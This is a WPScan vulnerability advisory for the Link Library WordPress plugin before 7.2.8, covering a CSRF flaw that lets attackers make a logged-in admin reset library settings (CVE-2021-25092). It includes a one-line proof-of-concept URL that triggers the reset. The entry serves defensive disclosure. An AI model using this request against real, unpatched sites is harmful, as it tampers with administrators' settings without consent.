WordPress Plugin Vulnerabilities

Link Library < 7.2.8 - Library Settings Reset via CSRF

Description

The plugin does not have CSRF check when resetting library settings, allowing attackers to make a logged in admin reset arbitrary settings via a CSRF attack

Proof of Concept

https://example.com/wp-admin/admin.php?page=link-library-settingssets&settings=1&reset=1

Affects Plugins

link-library

Fixed in version 7.2.9

References

CVE

CVE-2021-25092

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

1cd30913-67c7-46c3-a2de-dcca0c332323

Timeline

Publicly Published

2021-12-30 (about 8 months ago)

Added

2021-12-30 (about 8 months ago)

Last Updated

2022-04-16 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin